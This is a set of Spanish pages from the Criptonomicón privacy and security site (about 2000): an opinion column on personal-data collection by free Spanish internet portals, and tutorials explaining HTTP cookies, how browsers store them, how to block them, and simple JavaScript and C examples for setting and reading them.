Centro para la Democracia y Tecnologa

Privacidad y sociedad en Red

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros19.html (4 of 4) [25/10/2000 02:32:00 p.m.]

Piratas de chaqueta y corbata

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Piratas de chaqueta y corbata


Cuando uno se asoma a los grandes medios de comunicaciones, el
asombro surge cuando Internet aparece identificada con el fraude, la
delincuencia, la pornografa infantil o los grandes pelotazos. El pblico en
general que nunca se ha sentado ante un ordenador ni ha navegado por la
Red, termina por asociarla con antro de criminales o escenario de pelotazos
multimillonarios.
Como consecuencia, los usuarios que navegan desde sus casas, el usuario
de a pie que paga religiosamente el portazgo a Telefnica, comienza a dudar
y se pregunta: existe riesgo real en Internet o no?, de qu naturaleza? Los
grandes peligros de la Red se pueden agrupar en tres categoras: amenazas
a su intimidad y a sus datos de carcter personal; amenazas a la seguridad
de su informacin y de sus activos informticos; y por ltimo, amenazas a su
bolsillo, en forma de robos, fraudes y timos. Internet no es sino un espejo de
la sociedad, que refleja sus miserias y sus bondades.
En este artculo nos ocuparemos del primer peligro. Cuando nos explican de
dnde procede el riesgo para nuestra intimidad se nos habla de las cookies,
el lobo feroz de Internet que supuestamente devora con avidez datos acerca
de los navegantes; de los agujeros de los navegadores, que permiten en
teora hacerse con informacin del usuario; o de los troyanos que instalados
en nuestro ordenador abren distintos puertos por los cuales filtrar
informacin a piratas barbilampios acurrucados en sus cubiles iluminados
por la fosforescencia de la pantalla del monitor. Hay que reconocer que esos
peligros son reales, pero remotos, siendo insignificante el volumen de
internautas afectados por ellos. El verdadero peligro para la intimidad del
usuario es su propia ingenuidad.
Demasiado a menudo introduce sus datos personales a la ligera en el primer
formulario que se le presenta. Es un problema de buena fe y exceso de
confianza. Hay que saber sopesar qu datos se dan, a quin y para qu.
Piense que cuando se le hacen todas esas preguntas para entrar en el

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros18.html (1 of 4) [25/10/2000 02:32:00 p.m.]

Piratas de chaqueta y corbata


Consejos prcticos

Referencias

Libro de Visitas

sorteo de un fantstico reproductor de MP3, la motivacin oculta detrs de


esa peticin es hacerse con informacin demogrfica: su nombre y apellidos,
dnde vive, cul es su telfono, su DNI, sus ingresos, etc. De verdad quiere
dar todos esos datos para participar en un sorteo? Tenga en cuenta que esa
informacin, vinculada a sus correras por la Red, le identifican no ya como
una annima direccin IP o un nmero en una cookie, sino como una
persona sobre la que se conocen sus datos fundamentales.
Consideremos el caso de la reciente fiebre (o epidemia) de los portales:
Terra (Telefnica), Navegalia (Airtel), Alehop (Retevisin), Ya.com (Jazztel),
todos se han lanzado a presentar sus megapuertas de acceso a Internet.
Acceso gratuito, noticias gratuitas, correo gratuito, pgina web personal
gratuita, todo es gratuito, todo a favor del usuario, todo por el usuario y para
el usuario y sin cobrar ni un duro. Nunca se ha preguntado por qu una
compaa como Telefnica ofrece servicios a primera vista gratuitos?
Recuerda cuando Telefnica ofreci gratuitamente contestador automtico
a sus abonados? Qu chollo! Gratis! De veras? Piense que antes de ese
servicio, cuando llamaba a un telfono y nadie responda, la llamada se
perda sin beneficio para Telefnica. Ahora, salta el contestador (tantas
pesetas por establecimiento de llamada), espera a or el mensaje (tantas
pesetas por un minuto de llamada) y a veces hasta deja uno (tantas pesetas
ms por el tiempo que ha utilizado la lnea). Y no digamos a cunto montan
esas pesetitas si la llamada es interprovincial o desde mvil a hora punta.
Se da cuenta de los millones de ingresos al da que supone? Dnde
queda la gratuidad? Cuando la boa constrictor cie sus anillos alrededor de
su vctima, al espectador puede parecerle que est abrazandola, cuando en
realidad se est preparando para estrujarla.

El primer precio que paga por esos servicios gratuitos de los portales es su
informacin personal. El caso de Alehop es casi patolgico: incluso exigen el
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros18.html (2 of 4) [25/10/2000 02:32:00 p.m.]

Piratas de chaqueta y corbata

DNI del que solicita su servicio de correo, adems de su nombre completo,


fecha de nacimiento, telfono, profesin, sexo y domicilio, con cdigo postal
incluido. Todo ello sin una poltica de proteccin de datos claramente
establecida. Qu necesidad hay de entregar toda esa informacin a cambio
de una triste cuenta de correo Web, que no puede compararse en
prestaciones y servicios a la que por ejemplo ofrece Correo Yahoo! sin pedir
datos personales a cambio?
Si confiadamente rellena todos los formularios, en adelante, cuando navegue
por los megaportales, que concentran una buena parte de los servicios que
puede desear en Internet, el rastro que va dejando desde su ordenador ser
fcilmente vinculable a una persona con nombres y apellidos. Si lee noticias
sobre ftbol, en la tienda virtual compra material deportivo y en el chat no
para de hablar sobre los resultados de los partidos del da anterior, no se
extrae si luego le llega publicidad sobre deportes. Estos datos formarn
parte de una base de datos para ser utilizados con fines de promocin y
comercializacin de servicios de la compaa. Y todo por una direccin de
correo Web? Que no le engaen! Siempre que no sea absolutamente
necesario para poder recibir el servicio, d datos falsos. Que no jueguen con
su informacin personal. No caiga en la trampa de los sorteos o en el camelo
de los servicios gratuitos. Si quiere comprar algo a travs de Internet,
evidentemente deber dar una direccin postal real y un nmero de tarjeta
de crdito vlido. Pero nunca responda a preguntas improcedentes, como su
profesin o ingresos anuales. Tiene sentido que le pregunten por la
velocidad de su mdem, pero nunca por su religin o por su estado civil.
Recuerde, el volumen y carcter de los datos solicitados deben
corresponderse con el servicio prestado. Si no son imprescindibles para que
el servicio funcione correctamente, no revele su identidad, d datos falsos,
aunque plausibles. Que no le controlen ms.
No es probable que las compaas que ofrecen esos servicios utilicen sus
datos ms all del fin con que los recaban, es decir, marketing personalizado
para cobrar ms a sus anunciantes. Sin embargo, conocida la pattica
seguridad de sus sistemas, quin garantiza que no sern usados por
empleados desleales o por alguna organizacin criminal? Como anunciaba
Hispasec hace unos das, "en lo que podemos considerar un grave fallo de
seguridad y un gran error por parte de Telefnica, incluso contradiciendo
toda la normativa legal al respecto, los datos de las facturas de cualquier
abonado de Telefnica, lo que incluye nombre, direccin, NIF, e incluso
cuenta bancaria y desglose de llamadas, quedan accesibles a la consulta de
un navegador". Quin necesita hackers con compaas as?
Hoy en da, los piratas tecnolgicos no llevan parche en el ojo ni pata de
palo, visten con caros trajes de Ermenegildo Zegna y se sientan en grandes
despachos. Controlan los medios de informacin, las finanzas y muy pronto
Internet. Y los hackers tan malos de las revistas? Pobrecitos, comen
migajas mientras los otros se dan el banquete. Pues no les queda.
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros18.html (3 of 4) [25/10/2000 02:32:00 p.m.]

Piratas de chaqueta y corbata

Publicado en el Boletn del Criptonomicn #66.

Informacin adicional

Los peligros de las cookies

Infobel: Espaa

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros18.html (4 of 4) [25/10/2000 02:32:00 p.m.]

Cookies - Riesgos imaginarios y reales de las cookies

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

El Reverso Tenebroso de las


cookies
Desde los comienzos de esta nueva tecnologa, la expansin del
uso de las cookies se ha visto seriamente retrada como
consecuencia de una oleada de falsos rumores, verdades a medias y
ros de tinta de mala prensa.

Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Histeria colectiva

Aunque las cookies no son ms que un simple fichero de texto


almacenado por el navegador del usuario en su disco duro, inexplicablemente han
suscitado un clamor general en Internet, convirtindose tristemente en el centro de
cruzadas alarmistas anti-cookie que abogan por la intimidad y el anonimato.
Proclaman una serie de doctrinas, que gracias a la esencia abierta y tolerante de
Internet se propagan en cuestin de das a cientos de miles de usuarios, ms o menos
ingenuos.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/riesgos.html [25/10/2000 02:32:01 p.m.]

Cookies - Qu son las cookies

Principal
Riesgos
Usos
Ejemplos

Descripcin

A dieta
Recursos

Descripcin
La caja de las cookies
Ingredientes

Las cookies constituyen una potente herramienta empleada por los


servidores Web para almacenar y recuperar informacin acerca de Recetas en JavaScript
Recetas en CGI
sus visitantes. Dado que el Protocolo de Transferencia de
Recetas en ASP
HiperTexto (HTTP) es un protocolo sin estados (no almacena el
Horno Express
estado de la sesin entre peticiones sucesivas), las cookies
proporcionan una manera de conservar informacin entre peticiones del cliente,
extendiendo significativamente las capacidades de las aplicaciones cliente/servidor
basadas en la Web. Mediante el uso de cookies se permite al servidor Web recordar
algunos datos concernientes al usuario, como sus preferencias para la visualizacin
de las pginas de ese servidor, nombre y contrasea, productos que ms le interesan,
etc.
Una cookie no es ms que un fichero de texto que algunos servidores piden a nuestro
navegador que escriba en nuestro disco duro, con informacin acerca de lo que
hemos estado haciendo por sus pginas.
Entre las mayores ventajas de las cookies se cuenta el hecho de ser almacenadas en el
disco duro del usuario, liberando as al servidor de una importante sobrecarga. Es el
propio cliente el que almacena la informacin y quien se la devolver posteriormente
al servidor cuando ste la solicite. Adems, las cookies poseen una fecha de
caducidad, que puede oscilar desde el tiempo que dure la sesin hasta una fecha
futura especificada, a partir de la cual dejan de ser operativas.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/queson.html [25/10/2000 02:32:02 p.m.]

Cookies - Aplicaciones de las cookies

Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies

A dieta
Recursos

Bien vistos

Usos de las cookies

Mal vistos
Alternativas

Quin no ha pensado alguna vez en acceder a un sitio y encontrarlo personalizado a


nuestro gusto? A quin no le gustara cuando se conecta a su librera virtual que le
avisen de las novedades sobre aquellas materias que ms le interesan? A cunta
gente le parece un engorro tener que teclear su nombre y contrasea cada vez que se
conecta a un sitio de pago? Nunca has visitado una pgina con montones de
informacin por los que tienes que bucear para encontrar lo que te interesa? No
estara bien que cuando quieres bajarte programas de la red, no tengas que especificar
siempre que lo quieres para Windows95 o para Mac?
Personalizacin, sa es la palabra clave. La Tela de Araa Mundial
(WorldWideWeb) constituye una fantstica herramienta para crear presentaciones
con el potencial de llegar a cualquier persona en cualquier lugar del mundo (con
conexin a Internet, claro). Aunque la idea es muy atractiva, en la prctica ocurre que
la informacin presentada en las pginas se torna impersonal. Es algo as como
comprar un CD-ROM por el cual puedes navegar, incluso admirar animaciones y
escuchar sonidos y msica, pero que es igual para todo el mundo, y como todos
sabemos, las mismas cosas no nos interesan a todos por igual. Lo que realmente nos
gusta son los productos a nuestra medida, confeccionados especialmente para
nosotros.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/aplicac.html [25/10/2000 02:32:02 p.m.]

Cookies - Ejemplos

Principal
Qu son
Riesgos
Usos
A dieta
Recursos

Ejemplos en JavaScript
Contador personal
Bienvenida personalizada
ltima vez que se visit la pgina
Los tres anteriores juntos
Personalizacin de colores

Ejemplos en CGI
Carrito de la Compra en un Centro Comercial
Analizador de la actividad del usuario
Cmo refrescar banners

Ejemplo en ASP
Datos del cliente
Un paseo por tus cookies

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ejemplos.html [25/10/2000 02:32:03 p.m.]

Cookies - Estoy a dieta. No quiero ms cookies

Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores

Recursos

Cmo configurar los


navegadores

Protegerse en Unix
Protegerse en
Windows
Monstruos de las
galletas

Est bien, que no quieres saber nada de las cookies? Si ests


convencido de que las cookies amenazan tu intimidad y ests dispuesto a vivir sin la
comodidad que proporcionan, es tan fcil como desactivarlas, de forma que tu
navegador te avise cada vez que le quieren colar una cookie.
Desgraciadamente, la opcin por defecto tanto de Netscape como de Explorer es que
las cookies sean aceptadas silenciosamente. En consecuencia, muchos usuarios
pueden navegar durante aos por Internet, albergar 300 cookies en su disco duro y ni
siquiera saber que existen o qu son.

Netscape
En el men Opciones, en Preferencias de Red, en la pestaa de Protocolos,
marca la casilla Mostrar una advertencia antes de aceptar una cookie. Esto en
realidad no desactiva la cookie, sino que obliga al navegador a mandarte un aviso
cada vez que le envan una cookie. Con decir que no la quieres se acab el problema.
Sin embargo, ms que una solucin, esta componenda puede llegar a ser una tortura
si nos conectamos a un sitio que nos mande una cookie con cada imagen,
inundndonos con ellas. Si usas el Communicator, entonces vete al men de
Edicin, Preferencias y selecciona en el rbol la ramita de Avanzadas, ah
encontrars una serie de opciones sobre las cookies. Si de verdad ests lleno y no
quieres tragar ni una ms, selecciona la opcin de desactivar cookies siempre y a
correr.

Microsoft Internet Explorer


Si usas Microsoft Internet Explorer, en el men Ver, en Opciones, en la pestaa
Avanzadas, marca la casilla Avisar antes de recibir cookies. Si usas el Explorer
4.0, en el mismo lugar, vers que ahora adems se ha incluido la opcin de no recibir
ninguna cookie. Seleccinala.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/dieta.html (1 of 2) [25/10/2000 02:32:03 p.m.]

Cookies - Estoy a dieta. No quiero ms cookies

Navegacin annima
Otra forma de evitar las cookies es navegar a travs de un anonimizador.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/dieta.html (2 of 2) [25/10/2000 02:32:03 p.m.]

Cookies - Recursos en la Red

Principal
Qu son
Riesgos
Usos
Ejemplos
Andy's Netscape HTTP Cookie Info
A dieta

Cookie Central
Malcolm's Guide to Persistent Cookies
How Web Servers' Cookies Threaten Your Privacy
Client Side State - HTTP Cookies
Cookie I-D Drafts
Cookies
Do you want a cookie
Galletas De qu sabor las quieres
HotWired Search Results
How to make Netscape Cookies and shopping cart
Cookies with JavaScript
JavaScript Tip of the Week for November 25, 1
La Rebotica
Matt's Script Archive HTTP Cookie Library
The Cookie Trade 1
Web programming - adding cookies to your site
WebCoder.com - Your home for JavaScript and D.
Yahoo! - Computers and InternetInternetWorld
Cookies
Christmas Cookies Anyone?

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/recursos.html (1 of 2) [25/10/2000 02:32:04 p.m.]

Cookies - Recursos en la Red

"Who's watching you?", by Christopher Barr


"The truth about cookies", by Christopher Barr
"Making cookies with JavaScript", by Charity Kahn
Webpedia - Features - Privacy and You Part I
Packet: Simson Garfinkel - Technology
Cookies (en espaol)
NetscapeWorld - Use Cookies to Analyze User Activity and Create Custom Web
Pages - February 1997
Features - Drawing The Line On Cookies

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/recursos.html (2 of 2) [25/10/2000 02:32:04 p.m.]

Cookies - Cmo protegerse en UNIX

Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores

Recursos

Cmo protegerse en Unix


Se puede impedir que el navegador escriba en el fichero de las
cookies simplemente cambiando los permisos de ese fichero.

Protegerse en Unix
Protegerse en
Windows
Monstruos de las
galletas

Lo primero de todo es borrar todos los contenidos del fichero cookies, a pesar de
lo que diga en la cabecera. Para localizarlo, consulta la pgina la caja de las cookies.
Una vez vaciado su contenido, cambia su permiso escribiendo
chmod -w cookies
en la lnea de comandos. De esta forma el fichero es de slo lectura, por lo que no se
pueden modificar sus contenidos. No hay que olvidar que a pesar de bloquear el
fichero de las cookies, stas siguen estando activas en memoria en tanto dure la
sesin abierta con el navegador.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/unix.html [25/10/2000 02:32:04 p.m.]

Cookies - Cmo protegerse en Windows

Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores

Recursos

Cmo protegerse en Windows


Idealmente, se seguira una lnea de accin semejante a la indicada
para Unix.

Protegerse en Unix
Protegerse en
Windows
Monstruos de las
galletas

Netscape
Es decir, para el caso de Netscape se localiza el archivo de cookies, se borra todo su
contenido y se cambian sus propiedades a slo lectura, oculto y sistema. De esta
forma se evita que el navegador acceda al disco, aunque seguir dejando las cookies
en memoria, que durarn hasta que cerremos el navegador.

Internet Explorer
En el caso de Internet Explorer, dado que las cookies no se almacenan en un fichero
nico, sino en distintos ficheros en el directorio cookies, la idea consistira en
bloquear el acceso a dicho directorio. Para ello, se borran todos los ficheros con
cookies del mismo y se cambian las propiedades del directorio a slo lectura y
oculto. Sin embargo, esto no funciona, ya que el Explorer escribe a pesar de todo en
el directorio. Se podra pensar en otra estrategia, como bloquear cada fichero de
cookies que ya hemos recibido. Desgraciadamente, esta treta tampoco funciona, ya
que, ni corto ni perezoso, crea otro fichero con el mismo nombre, al que le aade un
nmero de orden: (1), (2), etc. Tambin he probado a modificar el registro, la opcin
del directorio por defecto para escribir las cookies, ponindolo a nul, pero ni con
esas. Sigue escribiendo en el directorio. As que aparte de un fichero bat que borre
los contenidos del directorio de cookies cada vez que arrancamos el navegador (ya
que mientras nevegamos las cookies se escriben en memoria, y no se vuelcan a disco
hasta que cerramos la sesin), no he encontrado solucin posible.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/windows.html (1 of 2) [25/10/2000 02:32:04 p.m.]

Cookies - Cmo protegerse en Windows


privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/windows.html (2 of 2) [25/10/2000 02:32:04 p.m.]

Cookies - Monstruos de las galletas

Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores

Recursos

Monstruos de las galletas

Protegerse en Unix
Protegerse en
Windows

Tambin abundan los monstruos de las galletas que no dejan ni las Monstruos de las
galletas
migas. Se trata de programas que funcionan conjuntamente con el
navegador, bloqueando todas o parte de las cookies que le llegan o borrando
peridicamente el archivo de cookies de tu disco duro. Estos programas pueden
resultar de utilidad incluso aunque se disponga de versiones 4 superior de los
navegadores, ya que hay situaciones en las que no conviene tener activada la opcin
de rechazar las cookies siempre, como en el caso de las visitas a tiendas en lnea,
como Amazon.com.
Si te interesa probar con alguno, puedes encontrarlos en las siguientes direcciones:
Cookie Pal

Cookie Software (PC).

NSClean and IEClean information.

Cookie Monster.

Luckman Anonymous Cookies for Internet Privacy Title.

The Limit Software - Cookie Crusher v1.6.

interMute Home Page.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/monstruos.html (1 of 2) [25/10/2000 02:32:05 p.m.]

Cookies - Monstruos de las galletas

Tambin puedes encontrar informacin sobre cmo funcionan en ZDNet, adems de


una tabla comparativa entre los productos ms extendidos.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/monstruos.html (2 of 2) [25/10/2000 02:32:05 p.m.]

Cookies - La caja de las cookies

Principal
Riesgos
Usos
Ejemplos

La caja de las cookies

A dieta
Recursos

Las cookies no las escribe el servidor, sino que es el propio


navegador del cliente quien almacena la cookie en su disco duro.

Dnde se esconden

Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express

Quieres saber exactamente dnde se esconde la caja con las


cookies? Bien, veamos varias instrucciones para distintos sistemas operativos que
nos permitirn rastrearlo:
Win 3.x
En el Administrador de archivos, en Archivo, selecciona Buscar y en la
ventanita a tal efecto escribe cookies.txt
Win95 o WinNT
Pulsa Inicio, selecciona Buscar y luego Archivos o carpetas, escribe
cookies.txt
Unix
Escribe en la lnea de comandos:
find . -name cookies
Ah tienes dnde se almacena la graciosa cookie con Netscape. Si todava usas
Microsoft Internet Explorer (cundo piensas disfrutar en serio de la red?), busca en
el directorio Win95 o WinNT, y encontrars un directorio llamado Cookies. Ah se
esconden las pcaras. Vers que a diferencia del Netscape, existe un fichero por cada
cookie, con el siguiente aspecto: <identificador de usuario>@<dominio.txt>, donde
dominio es la direccin de la mquina o bien el directorio (si es que no es el raz)
desde donde se envi la cookie. Bueno, otra filosofa de implementacin, que no
tiene mayor importancia.
Para ver qu se cuece dentro de la caja de las cookies no tienes ms que editarlas con
cualquier editor de texto. Sin embargo, debido a que las cookies se almacenan en
memoria hasta que sales del navegador, momento en que se escriben en el disco, no
es posible ver qu cookies has aceptado en tu fichero cookies.txt hasta que
sales. Pero si escribes el siguiente comando JavaScript en la barra de direcciones:
JavaScript:alert(document.cookie);

mientras ests conectado al sitio sospechoso, aparecer un cuadro informndote de


las cookies que te han colocado.
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/caja.html (1 of 2) [25/10/2000 02:32:05 p.m.]

Cookies - La caja de las cookies

Sin embargo, lo que s funcionar es lo siguiente. Pulsa en el botn de enviar cookie


y recibirs una cookie. A continuacin pulsa el botn de leer cookie, y la vers (junto
con todas las que hayas recibido de esa misma mquina).

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/caja.html (2 of 2) [25/10/2000 02:32:05 p.m.]

Cookies - Ingredientes de las cookies

Principal
Riesgos
Usos
Ejemplos
A dieta
Recursos

Ingredientes de las cookies


Vamos a examinar a continuacin la lista de ingredientes de una
cookie. Tomaremos como ejemplo la cookie recomendada por el
chef: la de Netscape.

Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP

Cada cookie representa una pequea porcin de informacin con


una fecha de caducidad opcional, que se aade al fichero o
directorio de cookies con el siguiente formato:

Horno Express

nombre = valor; expires = fechaCaducidad;


donde nombre es el nombre del dato almacenado, y valor representa su valor. La
fecha de caducidad es un parmetro opcional que indica el tiempo que se conservar
la cookie. Si no se especifica el valor de expires, la cookie caduca cuando el
usuario sale de la sesin en curso con el navegador. Por consiguiente, el navegador
conservar y recuperar la cookie slo si su fecha de caducidad an no ha expirado.

Ms ingredientes
No obstante, si editamos el fichero de cookies, veremos que aparecen muchos ms
datos, algunos bastante crpticos. Bien, vamos a analizarlos uno por uno.
Un dominio
Se trata de un nombre de dominio parcial o completo para el cual ser vlida la
cookie. El navegador devolver la cookie a todo host que encaje con el nombre
de dominio parcial. Por ejemplo, si especificas un nombre de dominio de la
forma .ehu.es, entonces el navegador devolver la cookie a servidores Web
alojados en cualquiera de las mquinas www.bi.ehu.es, bidx01.bi.ehu.es,
www.lg.ehu.es, etc. Los nombres de dominio deben incluir al menos dos
puntos para evitar intentos fraudulentos de encajar dominios de alto nivel
como .es. Si no se especifica ningn dominio, entonces el navegador slo
devolver la cookie a la mquina que la origin. Adems, este atributo viene
acompaado de un flag que indica si todas las mquinas dentro del dominio
especificado pueden acceder a la variable.
Un camino
Cuando se suministra el atributo de camino para la cookie, el navegador lo
contrastar con el URL de tu script antes de devolver la cookie. Por ejemplo, si
especificas el camino /cgi-bin, entonces la cookie ser devuelta a scripts de
la forma /cgi-bin/pedido.pl, /cgi-bin/datos.pl y
/cgi-bin/ficha_cliente/credito.pl, pero no al script
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ingre.html (1 of 2) [25/10/2000 02:32:05 p.m.]

Cookies - Ingredientes de las cookies

/cgi-administrador/webmaster.pl. Por defecto, el camino se establece al


camino del documento HTML o guin CGI que emiti la cookie, lo que hace
que la cookie se enve a cualquier guin en CGI o documento HTML que
cuelgue de ese directorio.
Secure
Este atributo indica que la cookie slo ser transmitida a travs de un canal
seguro con SSL.
Ejemplos
El fichero cookies.txt se lee al abrir el navegador. A partir de
ese momento el uso de cookies se gestiona en memoria y al cerrar
el navegador se almacenarn en el fichero aquellas cookies que no hayan caducado
(las que no especifican fecha de caducidad caducan al terminar la sesin).

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ingre.html (2 of 2) [25/10/2000 02:32:05 p.m.]

Cookies - Recetas en JavaScript

Principal
Riesgos
Usos
Ejemplos

Recetas en JavaScript

A dieta
Recursos

Las cookies son fcilmente accesibles a travs de la propiedad


cookie del objeto document, tanto para leerlas como para
escribirlas. document.cookie devuelve una cadena
conteniendo los cookies existentes en nuestra pgina.
Manipulando esta cadena con las funciones de manejo de Strings
disponibles es posible localizar la informacin a extraer, en caso
de lectura, o a escribir, en caso de enviar una cookie.

Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express

La forma ms sencilla de enviar una cookie es mediante la siguiente instruccin en


JavaScript:
document.cookie='ejemplo=cookie'
Como ya hemos explicado, la forma de visualizar esta propiedad es mediante un
sencillo mensaje de alerta:
JavaScript : alert(document.cookie);
Los siguientes botones llevan incorporadas las funciones anteriores. Puedes
experimentar con ellos:
Como has podido comprobar, aparecen las cookies agrupadas en pares name =
value;. Si quieres acceder a una cookie en concreto, necesitars unas funciones
ms sofisticadas.
Visita las pginas de ejemplos para ver cmo se utilizan estas funciones en
aplicaciones reales.
Si quieres aprender ms sobre JavaScript, visita las pginas del curso de Introduccin
a la programacin en JavaScript.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/recejava.html [25/10/2000 02:32:05 p.m.]

Cookies - Recetas en CGI

Principal
Riesgos
Usos
Ejemplos

Recetas en CGI

A dieta
Recursos

Para mandar una cookie en CGI, lo primero que se debe hacer es


escribir un shell script de UNIX, un programa en C, o en PERL o
en algn otro lenguaje. En lo que sigue, utilizaremos sencillos
programas en C.

Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express

En primer lugar, el programa debe crear la informacin de la


cabecera HTML y a continuacin enviar la cookie, seguida del resto del documento
HTML.
El formato de la cookie es:
Set-Cookie: NOMBRE=VALOR; expires=FECHA; path=CAMINO;
domain=NOMBRE_DOMINIO; secure
El significado de cada campo ya qued explicado en ingredientes de las cookies.
Todas estas cabeceras deben enviarse usando la forma estndar de salida por pantalla
del lenguaje correspondiente, en el caso del C, la funcin printf( ). El ejemplo
ms sencillo posible, que simplemente nos enva una cookie, sera:
int main()
{
printf("Set-Cookie: ejemplo=CookieCGI\n");
printf("Content-type: text/html\n\n");
printf("<html><head>\n");
printf("<title>Cookies</title>\n");
printf("</head>\n\n");
printf("<body>\n");
printf( "Te he enviado una cookie" );
printf("</body> </html>\n");
return 0;
}
